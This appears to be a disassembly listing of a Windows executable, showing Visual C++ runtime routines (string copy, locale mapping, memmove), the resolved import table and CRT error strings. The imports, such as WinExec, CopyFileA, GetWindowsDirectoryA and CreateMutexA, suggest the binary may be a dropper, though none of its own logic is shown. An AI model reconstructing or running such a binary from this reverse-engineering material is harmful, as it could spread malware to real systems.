mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404714
shr ecx, 2
jnz short loc_404781
jmp short loc_404735
; ---------------------------------------------------------------------------
loc_404714: ; CODE XREF: sub_4046F0+1B�j
; sub_4046F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404742
test al, al
jz short loc_40474A
test esi, 3
jnz short loc_404714
mov ebx, ecx
shr ecx, 2
jnz short loc_404781
loc_404730: ; CODE XREF: sub_4046F0+8F�j
and ebx, 3
jz short loc_404742
loc_404735: ; CODE XREF: sub_4046F0+22�j
; sub_4046F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40476E
dec ebx
jnz short loc_404735
loc_404742: ; CODE XREF: sub_4046F0+2B�j
; sub_4046F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40474A: ; CODE XREF: sub_4046F0+2F�j
test edi, 3
jz short loc_404764
loc_404752: ; CODE XREF: sub_4046F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4047E6
test edi, 3
jnz short loc_404752
loc_404764: ; CODE XREF: sub_4046F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4047D7
loc_40476B: ; CODE XREF: sub_4046F0+7F�j
; sub_4046F0+F4�j
mov [edi], al
inc edi
loc_40476E: ; CODE XREF: sub_4046F0+4D�j
dec ebx
jnz short loc_40476B
pop ebx
pop esi
loc_404773: ; CODE XREF: sub_4046F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_4046F0+A9�j
; sub_4046F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404730
loc_404781: ; CODE XREF: sub_4046F0+20�j
; sub_4046F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404779
test dl, dl
jz short loc_4047CB
test dh, dh
jz short loc_4047C1
test edx, 0FF0000h
jz short loc_4047B7
test edx, 0FF000000h
jnz short loc_404779
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047B7: ; CODE XREF: sub_4046F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047C1: ; CODE XREF: sub_4046F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047CB: ; CODE XREF: sub_4046F0+AD�j
xor edx, edx
mov [edi], edx
loc_4047CF: ; CODE XREF: sub_4046F0+C5�j
; sub_4046F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4047E1
loc_4047D7: ; CODE XREF: sub_4046F0+79�j
xor eax, eax
loc_4047D9: ; CODE XREF: sub_4046F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4047D9
loc_4047E1: ; CODE XREF: sub_4046F0+E5�j
and ebx, 3
jnz short loc_40476B
loc_4047E6: ; CODE XREF: sub_4046F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4046F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047EE proc near ; CODE XREF: sub_403BD6+BE�p
; sub_403BD6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405498
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_40726C, edi
jnz short loc_404864
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405448
mov esi, 100h
push esi
push edi
call dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_404842
mov dword_40726C, ebx
jmp short loc_404864
; ---------------------------------------------------------------------------
loc_404842: ; CODE XREF: sub_4047EE+4A�j
push edi
push edi
push ebx
push offset dword_4070C8
push esi
push edi
call dword_4050B4 ; LCMapStringA
test eax, eax
jz loc_40497C
mov dword_40726C, 2
loc_404864: ; CODE XREF: sub_4047EE+2E�j
; sub_4047EE+52�j
cmp [ebp+arg_C], edi
jle short loc_404879
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404A12
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404879: ; CODE XREF: sub_4047EE+79�j
mov eax, dword_40726C
cmp eax, 2
jnz short loc_4048A0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050B4 ; LCMapStringA
jmp loc_40497E
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4047EE+93�j
cmp eax, 1
jnz loc_40497C
cmp [ebp+arg_18], edi
jnz short loc_4048B6
mov eax, dword_407264
mov [ebp+arg_18], eax
loc_4048B6: ; CODE XREF: sub_4047EE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_405084 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40497C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404911
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404911: ; CODE XREF: sub_4047EE+10E�j
cmp [ebp+var_24], edi
jz short loc_40497C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_405084 ; MultiByteToWideChar
test eax, eax
jz short loc_40497C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40497C
test byte ptr [ebp+arg_4+1], 4
jz short loc_404990
cmp [ebp+arg_14], edi
jz loc_404A0B
cmp esi, [ebp+arg_14]
jg short loc_40497C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
test eax, eax
jnz loc_404A0B
loc_40497C: ; CODE XREF: sub_4047EE+66�j
; sub_4047EE+B5�j ...
xor eax, eax
loc_40497E: ; CODE XREF: sub_4047EE+AD�j
; sub_4047EE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404990: ; CODE XREF: sub_4047EE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4049C4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4049C4: ; CODE XREF: sub_4047EE+1C2�j
cmp ebx, edi
jz short loc_40497C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_40497C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4049EB
push edi
push edi
jmp short loc_4049F1
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4047EE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4049F1: ; CODE XREF: sub_4047EE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4050C0 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40497C
loc_404A0B: ; CODE XREF: sub_4047EE+165�j
; sub_4047EE+188�j
mov eax, esi
jmp loc_40497E
sub_4047EE endp
; =============== S U B R O U T I N E =======================================
sub_404A12 proc near ; CODE XREF: sub_4047EE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_404A2F
loc_404A22: ; CODE XREF: sub_404A12+1B�j
cmp byte ptr [eax], 0
jz short loc_404A2F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404A22
loc_404A2F: ; CODE XREF: sub_404A12+E�j
; sub_404A12+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_404A3A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_404A3A: ; CODE XREF: sub_404A12+21�j
mov eax, edx
retn
sub_404A12 endp
; =============== S U B R O U T I N E =======================================
sub_404A3D proc near ; CODE XREF: sub_403DB8+1F�p
arg_0 = dword ptr 4
mov eax, dword_407274
test eax, eax
jz short loc_404A55
push [esp+arg_0]
call eax ; dword_407274
test eax, eax
pop ecx
jz short loc_404A55
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404A55: ; CODE XREF: sub_404A3D+7�j
; sub_404A3D+12�j
xor eax, eax
retn
sub_404A3D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A60 proc near ; CODE XREF: sub_403E83+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404A80
cmp edi, eax
jb loc_404BF8
loc_404A80: ; CODE XREF: sub_404A60+16�j
test edi, 3
jnz short loc_404A9C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
loc_404A9C: ; CODE XREF: sub_404A60+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404AB4
and eax, 3
add ecx, eax
jmp dword ptr loc_404ABC+4[eax*4]
; ---------------------------------------------------------------------------
loc_404AB4: ; CODE XREF: sub_404A60+46�j
jmp dword ptr loc_404BB8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404ABC: ; CODE XREF: sub_404A60+31�j
; sub_404A60+8E�j ...
jmp off_404B3C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404AD0
dd offset loc_404AFC
dd offset loc_404B20
; ---------------------------------------------------------------------------
loc_404AD0: ; DATA XREF: sub_404A60+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404AFC: ; DATA XREF: sub_404A60+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B20: ; DATA XREF: sub_404A60+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404B3C dd offset loc_404B9F ; DATA XREF: sub_404A60:loc_404ABC�r
dd offset loc_404B8C
dd offset loc_404B84
dd offset loc_404B7C
dd offset loc_404B74
dd offset loc_404B6C
dd offset loc_404B64
dd offset loc_404B5C
; ---------------------------------------------------------------------------
loc_404B5C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404B64: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404B6C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404B74: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404B7C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404B84: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404B8C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404B9F: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60:off_404B3C�o
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404BA8 dd offset loc_404BB8 ; DATA XREF: sub_404A60+35�r
; sub_404A60+92�r ...
dd offset loc_404BC0
dd offset loc_404BCC
dd offset loc_404BE0
; ---------------------------------------------------------------------------
loc_404BB8: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BC0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BCC: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BE0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BF8: ; CODE XREF: sub_404A60+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404C2C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404C20: ; CODE XREF: sub_404A60+1B1�j
; sub_404A60+208�j ...
neg ecx
jmp off_404CF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C2C: ; CODE XREF: sub_404A60+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404C44
and eax, 3
sub ecx, eax
jmp dword ptr loc_404C44+4[eax*4]
; ---------------------------------------------------------------------------
loc_404C44: ; CODE XREF: sub_404A60+1D6�j
; DATA XREF: sub_404A60+1DD�r
jmp off_404D40[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C58
dd offset loc_404C78
dd offset loc_404CA0
; ---------------------------------------------------------------------------
loc_404C58: ; DATA XREF: sub_404A60+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; DATA XREF: sub_404A60+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404CA0: ; DATA XREF: sub_404A60+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404CF4
dd offset loc_404CFC
dd offset loc_404D04
dd offset loc_404D0C
dd offset loc_404D14
dd offset loc_404D1C
dd offset loc_404D24
off_404CF0 dd offset loc_404D37 ; DATA XREF: sub_404A60+1C2�r
; ---------------------------------------------------------------------------
loc_404CF4: ; DATA XREF: sub_404A60+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404CFC: ; DATA XREF: sub_404A60+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404D04: ; DATA XREF: sub_404A60+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404D0C: ; DATA XREF: sub_404A60+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404D14: ; DATA XREF: sub_404A60+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404D1C: ; DATA XREF: sub_404A60+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404D24: ; DATA XREF: sub_404A60+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404D37: ; CODE XREF: sub_404A60+1C2�j
; DATA XREF: sub_404A60:off_404CF0�o
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404D40 dd offset loc_404D50 ; DATA XREF: sub_404A60+1B7�r
; sub_404A60:loc_404C44�r ...
dd offset loc_404D58
dd offset loc_404D68
dd offset loc_404D7C
; ---------------------------------------------------------------------------
loc_404D50: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D58: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D68: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D7C: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404A60 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D96 proc near ; CODE XREF: sub_401B1B+33�p
jmp dword_405148
sub_404D96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D9C proc near ; CODE XREF: sub_401B1B+24�p
jmp dword_405140
sub_404D9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA2 proc near ; CODE XREF: sub_401B1B+7�p
jmp dword_405144
sub_404DA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA8 proc near ; CODE XREF: sub_4034B0+13�p
jmp dword_40508C
sub_404DA8 endp
; ---------------------------------------------------------------------------
align 10h
dd 94h dup(0)
dword_405000 dd 0 ; sub_40219B+C8�r
dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 ; sub_40219B+97�r
dword_405010 dd 0 align 8
dword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40126C+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B59+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C835406h ; resolved to->KERNEL32._llseekdword_405028 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_40502C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401583+4D0�r ...
dword_405030 dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405034 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405038 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F4B+14D�r ...
dword_40503C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_4020D9:loc_40213A�r
dword_405040 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405044 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPrioritydword_405048 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThreaddword_40504C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405050 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_405054 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405058 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_40505C dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405060 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405064 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_405068 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404568+51�r
dword_40506C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403E1A+D�r ...
dword_405070 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405074 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_405078 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403BD6+14�r
dword_40507C dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_40380C+12D�r
dword_405080 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_40380C+8D�r
dword_405084 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40380C+11B�r ...
dword_405088 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40508C dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405090 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403E83+2C4�r ...
dword_405094 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_405098 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_40509C dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_4050A0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_4032C7+166�r
dword_4050A4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_4036B9+143�r
dword_4050A8 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050AC dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_4047EE+14D�r ...
dword_4050B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4050B4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_4047EE+A7�r
dword_4050B8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050BC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_403195+E1�r
dword_4050C0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4047EE+20D�r
dword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050CC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_4032C7+59�r
dword_4050D0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050D4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050D8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402C00+91�r
dword_4050DC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050E4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050E8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050F0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40137D+26�r ...
dword_4050F4 dd 7E45058Ah ; resolved to->USER32.MessageBoxA dd 0
dword_4050FC dd 0 dd 0
dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 dword_405110 dd 0 dword_405114 dd 0 ; sub_401583+2DD�r ...
dword_405118 dd 0 ; sub_40137D+151�r ...
dword_40511C dd 0 ; sub_40126C+27�r ...
dword_405120 dd 0 ; sub_40126C+51�r ...
dword_405124 dd 0 ; sub_40126C+6C�r ...
dword_405128 dd 0 ; sub_40126C+105�r ...
dword_40512C dd 0 dword_405130 dd 0 dword_405134 dd 0 ; sub_4011D5+7�r ...
dword_405138 dd 0 ; sub_4011D5+1E�r ...
align 10h
dword_405140 dd 0 dword_405144 dd 0 dword_405148 dd 0 align 10h
dword_405150 dd 0FFFFFFFFh, 402A05h, 402A19h, 746E7572h, 20656D69h
; DATA XREF: .text:00402933�o
dd 6F727265h, 2072h, 534F4C54h, 72652053h, 0D726F72h, 0Ah
dd 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406F34�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4036B9+119�o
align 4
asc_40540C db 0Ah ; DATA XREF: sub_4036B9+F1�o
db 0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4036B9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4036B9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4036B9+7D�o
align 4
dword_405448 dd 2 dup(0) ; sub_4047EE+36�o
dword_405450 dd 0FFFFFFFFh, 403905h, 403909haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404663+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404663+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404663+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404663+D�o
align 4
dword_405498 dd 0FFFFFFFFh, 4048FEh, 404902h, 0FFFFFFFFh, 4049B2h, 4049B6h
; DATA XREF: sub_4047EE+5�o
dd 562Ch, 2 dup(0)
dd 56A6h, 50F0h, 5554h, 2 dup(0)
dd 57D0h, 5018h, 5640h, 2 dup(0)
dd 57DEh, 5104h, 5638h, 2 dup(0)
dd 5806h, 50FCh, 553Ch, 2 dup(0)
dd 586Ah, 5000h, 567Ch, 2 dup(0)
dd 58ACh, 5140h, 5 dup(0)
